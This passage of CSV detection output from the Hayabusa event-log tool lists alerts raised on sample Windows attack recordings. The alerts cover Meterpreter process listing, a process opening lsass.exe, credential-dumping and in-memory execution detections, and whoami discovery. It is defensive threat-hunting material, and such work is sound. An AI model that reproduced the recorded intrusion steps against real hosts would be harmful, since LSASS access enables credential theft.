Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:55.472 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x10896 | PID: 2244 | PGUID: 365ABB72-65CB-5CC7-0000-001002202600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 16:22:56.571 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Temp\opera autoupdate\installer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 2784 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010CB280E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:22:56.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: 
C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:22:57.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3624 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.883 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-F69F-5CC7-0000-0010132B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: 
C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001033480000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A74B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00103F4C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001043520000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: 
D:\m.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001004550000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001072590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 500 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A3590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 616 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010BB700000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process 
Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxService.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 676 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010E7AC0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 740 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00101AB00000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 804 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00105FB40000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 872 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001015C00000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 
+09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 908 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010A7C40000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 
+09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 956 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001014C90000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1016 | Tgt PGUID: 
365ABB72-F6A2-5CC7-0000-001012CF0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1148 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010F9D80000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\spoolsv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1288 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00100EED0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1328 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010B8F20000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | 
Tgt PID: 1476 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010D30E0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1504 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-001062120100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1572 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010051A0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\bin\cygrunsrv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1732 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010443A0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1904 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010F7500100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\usr\sbin\sshd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1952 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-00108A560100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wlms\wlms.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1996 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-0010C65F0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\unsecapp.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1000 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001098750100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\sppsvc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | 
Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1896 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001020BA0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2160 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00100CD40100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2192 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-001094D70100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2360 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00108AFF0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program 
Files\Google\Update\1.3.34.7\GoogleCrashHandler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2416 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-00103F140200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2448 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-0010DC200200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\Dwm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2788 | Tgt PGUID: 